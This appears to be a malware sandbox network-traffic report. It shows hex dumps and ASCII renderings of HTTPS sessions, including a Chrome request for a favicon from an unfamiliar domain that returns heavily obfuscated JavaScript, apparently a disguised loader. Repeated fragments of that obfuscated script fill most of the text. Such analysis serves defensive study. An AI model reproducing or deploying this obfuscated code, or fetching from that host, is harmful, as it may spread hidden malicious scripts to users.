            2024-04-19 03:49:18 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
            Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
            2024-04-19 03:49:18 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
            Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
            2024-04-19 03:49:18 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
            Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
            2024-04-19 03:49:18 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
            Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
            2024-04-19 03:49:18 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
            Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
            2024-04-19 03:49:18 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
            Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
            2024-04-19 03:49:19 UTC1369INData Raw: 4f 57 50 39 57 57 50 79 27 2c 27 57 52 6a 73 6c 38 6b 69 6e 38 6f 4f 57 36 30 45 42 59 4c 37 27 2c 27 57 36 64 64 49 43 6f 2b 64 61 27 2c 27 57 52 64 63 47 74 58 7a 57 52 7a 41 57 34 68 63 49 43 6f 44 27 2c 27 74 38 6b 52 57 36 62 65 71 57 27 2c 27 57 51 53 70 57 35 4a 64 54 48 79 27 2c 27 57 37 58 75 6f 32 46 63 4d 61 27 2c 27 71 38 6b 6e 57 52 7a 32 57 51 4f 27 2c 27 73 38 6b 2f 6d 65 42 63 55 57 27 2c 27 78 38 6b 35 6a 43 6f 5a 57 36 71 27 2c 27 41 38 6b 54 57 50 4e 63 4f 43 6f 5a 27 2c 27 57 34 2f 63 50 6d 6b 72 57 35 78 63 4b 61 27 2c 27 57 51 79 59 57 35 75 64 75 57 27 2c 27 62 6d 6b 50 57 52 58 64 57 52 75 27 2c 27 57 37 42 64 48 4d 44 35 57 4f 43 27 5d 3b 5f 30 78 35 39 64 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 61 66
            Data Ascii: OWP9WWPy','WRjsl8kin8oOW60EBYL7','W6ddICo+da','WRdcGtXzWRzAW4hcICoD','t8kRW6beqW','WQSpW5JdTHy','W7Xuo2FcMa','q8knWRz2WQO','s8k/meBcUW','x8k5jCoZW6q','A8kTWPNcOCoZ','W4/cPmkrW5xcKa','WQyYW5uduW','bmkPWRXdWRu','W7BdHMD5WOC'];_0x59db=function(){return _0xaf
            2024-04-19 03:49:19 UTC1369INData Raw: 34 62 65 62 34 37 28 27 6a 65 4c 59 27 2c 2d 30 78 31 32 33 2c 2d 30 78 31 33 34 2c 2d 30 78 31 35 33 2c 2d 30 78 31 37 34 29 2b 5f 30 78 31 33 65 62 39 34 28 2d 30 78 63 2c 30 78 39 2c 27 31 36 56 62 27 2c 30 78 32 31 2c 2d 30 78 31 32 29 2c 5f 30 78 33 34 66 36 37 66 3d 5f 30 78 34 62 65 62 34 37 28 27 7a 72 47 57 27 2c 2d 30 78 66 66 2c 2d 30 78 66 30 2c 2d 30 78 66 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 39 38 65 38 31 28 30 78 31 37 62 2c 27 77 51 4d 33 27 2c 30 78 31 63 65 2c 30 78 31 61 39 2c 30 78 31 63 63 29 2b 27 73 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 35 34 65 66 38 36 2c 5f 30 78 31 31 32 63 65 66 29 7b 76 61 72 20 5f 30 78 34 65 64 31 65 32 3d 5f 30 78 35 39 64 62 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64
            Data Ascii: 4beb47('jeLY',-0x123,-0x134,-0x153,-0x174)+_0x13eb94(-0xc,0x9,'16Vb',0x21,-0x12),_0x34f67f=_0x4beb47('zrGW',-0xff,-0xf0,-0xf5,-0xbd)+_0x598e81(0x17b,'wQM3',0x1ce,0x1a9,0x1cc)+'s';function _0x58cd(_0x54ef86,_0x112cef){var _0x4ed1e2=_0x59db();return _0x58cd
            2024-04-19 03:49:19 UTC1369INData Raw: 78 32 65 65 33 64 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 36 62 37 32 30 2c 5f 30 78 33 63 64 30 30 38 29 7b 76 61 72 20 5f 30 78 31 62 62 38 32 63 3d 5b 5d 2c 5f 30 78 31 63 34 61 39 65 3d 2d 30 78 31 64 37 63 2b 30 78 31 38 62 2a 30 78 37 2b 30 78 31 32 61 66 2c 5f 30 78 64 62 32 33 37 64 2c 5f 30 78 33 30 31 30 33 38 3d 27 27 3b 5f 30 78 33 36 62 37 32 30 3d 5f 30 78 35 34 30 30 34 38 28 5f 30 78 33 36 62 37 32 30 29 3b 76 61 72 20 5f 30 78 32 34 37 30 61 66 3b 66 6f 72 28 5f 30 78 32 34 37 30 61 66 3d 30 78 31 37 65 2a 30 78 34 2b 2d 30 78 35 65 2a 2d 30 78 35 31 2b 30 78 65 2a 2d 30 78 32 38 64 3b 5f 30 78 32 34 37 30 61 66 3c 2d 30 78 31 61 33 63 2b 2d 30 78 31 2a 30 78 31 32 63 62 2b 30 78 31 2a 30 78 32 65 30 37 3b 5f 30 78 32 34 37 30 61 66
            Data Ascii: x2ee3dd=function(_0x36b720,_0x3cd008){var _0x1bb82c=[],_0x1c4a9e=-0x1d7c+0x18b*0x7+0x12af,_0xdb237d,_0x301038='';_0x36b720=_0x540048(_0x36b720);var _0x2470af;for(_0x2470af=0x17e*0x4+-0x5e*-0x51+0xe*-0x28d;_0x2470af<-0x1a3c+-0x1*0x12cb+0x1*0x2e07;_0x2470af


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.44974323.63.206.91443
            TimestampBytes transferredDirectionData
            2024-04-19 03:49:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-04-19 03:49:20 UTC467INHTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (chd/073D)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-eus-z1
            Cache-Control: public, max-age=184468
            Date: Fri, 19 Apr 2024 03:49:20 GMT
            Connection: close
            X-CID: 2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.44974423.63.206.91443
            TimestampBytes transferredDirectionData
            2024-04-19 03:49:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-04-19 03:49:21 UTC531INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
            Cache-Control: public, max-age=184452
            Date: Fri, 19 Apr 2024 03:49:21 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-04-19 03:49:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.449745193.163.7.1134435724C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-04-19 03:49:21 UTC356OUTGET /favicon.ico HTTP/1.1
            Host: bestresulttostart.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-04-19 03:49:22 UTC263INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 19 Apr 2024 03:49:22 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Vary: Accept-Encoding
            Strict-Transport-Security: max-age=31536000;
            2024-04-19 03:49:22 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
            Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
            2024-04-19 03:49:22 UTC1369INData Raw: 2c 27 5e 44 23 61 27 2c 2d 30 78 64 32 29 29 2f 28 30 78 32 34 66 33 2b 2d 30 78 31 39 35 66 2b 30 78 61 65 2a 2d 30 78 31 31 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 38 62 36 33 34 28 27 33 32 63 28 27 2c 30 78 31 32 65 2c 30 78 31 31 32 2c 30 78 31 33 64 2c 30 78 31 34 63 29 29 2f 28 2d 30 78 34 2a 30 78 34 61 2b 2d 30 78 31 61 35 31 2b 30 78 36 65 2a 30 78 34 30 29 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 64 33 2c 2d 30 78 31 32 64 2c 2d 30 78 63 36 2c 27 77 51 4d 33 27 2c 2d 30 78 66 35 29 29 2f 28 30 78 63 64 2a 30 78 31 63 2b 2d 30 78 33 65 39 2a 2d 30 78 31 2b 2d 30 78 31 61 34 64 29 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 64 30 37 61 28 2d 30 78 66 64 2c 2d 30 78 63 64 2c 2d 30 78 65 61 2c 27 54 55 56
            Data Ascii: ,'^D#a',-0xd2))/(0x24f3+-0x195f+0xae*-0x11)*(parseInt(_0x58b634('32c(',0x12e,0x112,0x13d,0x14c))/(-0x4*0x4a+-0x1a51+0x6e*0x40))+parseInt(_0x15d07a(-0xd3,-0x12d,-0xc6,'wQM3',-0xf5))/(0xcd*0x1c+-0x3e9*-0x1+-0x1a4d)*(parseInt(_0x15d07a(-0xfd,-0xcd,-0xea,'TUV
            2024-04-19 03:49:22 UTC1369INData Raw: 78 35 31 33 38 39 63 28 2d 30 78 39 34 2c 27 33 38 33 6d 27 2c 2d 30 78 62 65 2c 2d 30 78 63 34 2c 2d 30 78 62 62 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 61 63 2c 27 4c 4d 6e 4b 27 2c 30 78 33 64 31 2c 30 78 33 64 39 2c 30 78 33 64 32 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 34 64 2c 30 78 33 32 38 2c 30 78 33 33 62 2c 30 78 33 35 63 29 2b 5f 30 78 35 65 66 30 64 62 28 30 78 33 65 39 2c 27 68 4c 6c 68 27 2c 30 78 33 65 30 2c 30 78 33 62 31 2c 30 78 33 65 33 29 2b 5f 30 78 31 30 61 34 36 63 28 27 68 5d 66 7a 27 2c 30 78 33 61 33 2c 30 78 33 37 63 2c 30 78 33 61 32 2c 30 78 33 36 39 29 2b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 62 32 2c 27 54 5b 6b 62 27 2c 2d 30 78 62 37 2c 2d 30 78 61 35 2c 2d 30 78 62 64 29 2b 5f 30 78 35 65
            Data Ascii: x51389c(-0x94,'383m',-0xbe,-0xc4,-0xbb)+_0x5ef0db(0x3ac,'LMnK',0x3d1,0x3d9,0x3d2)+_0x10a46c('qMqR',0x34d,0x328,0x33b,0x35c)+_0x5ef0db(0x3e9,'hLlh',0x3e0,0x3b1,0x3e3)+_0x10a46c('h]fz',0x3a3,0x37c,0x3a2,0x369)+_0x51389c(-0xb2,'T[kb',-0xb7,-0xa5,-0xbd)+_0x5e
            2024-04-19 03:49:22 UTC1369INData Raw: 2c 30 78 34 61 61 2c 30 78 34 39 36 2c 30 78 34 65 31 29 2b 5f 30 78 31 30 61 34 36 63 28 27 71 4d 71 52 27 2c 30 78 33 30 33 2c 30 78 32 63 36 2c 30 78 33 30 34 2c 30 78 32 66 63 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 36 65 62 31 30 28 27 68 5d 66 7a 27 2c 30 78 34 64 34 2c 30 78 34 66 35 2c 30 78 34 65 37 2c 30 78 34 61 34 29 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 65 63 39 66 28 5f 30 78 31 64 39 38 33 32 2c 5f 30 78 64 35 32 30 35 62 2c 5f 30 78 32 33 32 35 36 64 2c 5f 30 78 32 31 65 32 32 34 2c 5f 30 78 35 32 62 64 35 65 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 64 39 38 33 32 2d 30 78 39 37 2c 5f 30 78 64 35 32 30 35 62 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 36 65 62 31 30 28 5f 30 78 35 33 37 35
            Data Ascii: ,0x4aa,0x496,0x4e1)+_0x10a46c('qMqR',0x303,0x2c6,0x304,0x2fc)](_0x159d5c[_0x56eb10('h]fz',0x4d4,0x4f5,0x4e7,0x4a4)]);function _0x3eec9f(_0x1d9832,_0xd5205b,_0x23256d,_0x21e224,_0x52bd5e){return _0x58cd(_0x1d9832-0x97,_0xd5205b);}function _0x56eb10(_0x5375
            2024-04-19 03:49:22 UTC1369INData Raw: 27 62 6e 74 75 27 2c 30 78 32 35 65 2c 30 78 32 36 33 2c 30 78 32 38 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 37 2c 27 70 44 61 4f 27 2c 2d 30 78 31 32 39 2c 2d 30 78 31 31 65 2c 2d 30 78 64 61 29 5d 29 29 2c 21 5b 5d 29 29 7b 69 66 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 5d 6f 58 67 27 2c 30 78 33 36 65 2c 30 78 33 36 34 2c 30 78 33 35 34 2c 30 78 33 34 34 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 33 64 66 2c 27 5a 77 79 72 27 2c 30 78 34 33 66 2c 30 78 34 31 36 2c 30 78 33 65 36 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 31 33 38 39 63 28 2d 30 78 66 35 2c 27 34 33 5e 79 27 2c 2d 30 78 63 30 2c 2d 30 78 31 32 37 2c 2d 30 78 66 63 29 5d 29 29 72
            Data Ascii: 'bntu',0x25e,0x263,0x284)](_0x159d5c[_0x51389c(-0xf7,'pDaO',-0x129,-0x11e,-0xda)])),![])){if(_0x159d5c[_0x10a46c(']oXg',0x36e,0x364,0x354,0x344)](_0x159d5c[_0x5ef0db(0x3df,'Zwyr',0x43f,0x416,0x3e6)],_0x159d5c[_0x51389c(-0xf5,'43^y',-0xc0,-0x127,-0xfc)]))r
            2024-04-19 03:49:22 UTC1369INData Raw: 32 36 38 2c 27 54 55 56 66 27 2c 30 78 32 38 61 2c 30 78 32 36 65 2c 30 78 32 38 38 29 2b 27 65 27 5d 28 29 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 31 30 61 34 36 63 28 27 24 52 4f 6b 27 2c 30 78 33 30 62 2c 30 78 33 30 63 2c 30 78 32 66 30 2c 30 78 33 30 39 29 5d 28 5f 30 78 34 34 62 62 37 66 2c 27 27 29 3a 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 35 65 66 30 64 62 28 30 78 34 31 32 2c 27 33 38 33 6d 27 2c 30 78 34 32 37 2c 30 78 33 66 36 2c 30 78 33 66 32 29 5d 28 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 37 63 2c 27 4f 55 46 73 27 2c 30 78 32 39 30 2c 30 78 32 61 32 2c 30 78 32 34 66 29 5d 2c 5f 30 78 31 35 39 64 35 63 5b 5f 30 78 33 65 65 63 39 66 28 30 78 32 36 39 2c 27 42 24 5a 59 27 2c 30 78 32 39 63 2c 30 78 32 36 65
            Data Ascii: 268,'TUVf',0x28a,0x26e,0x288)+'e']()):_0x159d5c[_0x10a46c('$ROk',0x30b,0x30c,0x2f0,0x309)](_0x44bb7f,''):_0x159d5c[_0x5ef0db(0x412,'383m',0x427,0x3f6,0x3f2)](_0x159d5c[_0x3eec9f(0x27c,'OUFs',0x290,0x2a2,0x24f)],_0x159d5c[_0x3eec9f(0x269,'B$ZY',0x29c,0x26e
            2024-04-19 03:49:22 UTC1369INData Raw: 27 76 38 6b 6c 57 50 72 44 6e 61 27 2c 27 46 5a 50 78 57 37 2f 63 52 71 27 2c 27 71 53 6f 2b 57 37 56 64 47 38 6b 50 27 2c 27 57 36 5a 64 48 4c 31 30 57 50 69 27 2c 27 57 36 4f 78 42 47 27 2c 27 66 4d 66 51 27 2c 27 57 34 47 59 57 52 74 63 52 53 6b 41 27 2c 27 57 36 4b 32 57 50 4b 43 27 2c 27 66 38 6f 72 65 73 4f 2f 71 47 46 63 47 6d 6b 6b 27 2c 27 76 53 6b 34 57 51 72 72 57 51 4f 27 2c 27 57 34 52 63 55 6d 6f 4a 43 58 30 27 2c 27 73 4a 39 48 57 4f 75 58 72 38 6b 38 61 4e 30 27 2c 27 65 6d 6f 65 79 77 4e 64 54 73 56 64 4b 30 30 4b 27 2c 27 66 53 6f 68 71 4a 6c 64 4a 43 6f 64 65 6d 6f 47 57 36 34 70 7a 4d 61 27 2c 27 57 51 6c 64 4d 59 42 64 53 68 2f 63 55 31 70 64 48 53 6b 6f 27 2c 27 73 53 6b 4b 62 31 68 64 4c 57 27 2c 27 57 51 33 64 4b 67 4a 64 4b 43 6f
            Data Ascii: 'v8klWPrDna','FZPxW7/cRq','qSo+W7VdG8kP','W6ZdHL10WPi','W6OxBG','fMfQ','W4GYWRtcRSkA','W6K2WPKC','f8oresO/qGFcGmkk','vSk4WQrrWQO','W4RcUmoJCX0','sJ9HWOuXr8k8aN0','emoeywNdTsVdK00K','fSohqJldJCodemoGW64pzMa','WQldMYBdSh/cU1pdHSko','sSkKb1hdLW','WQ3dKgJdKCo
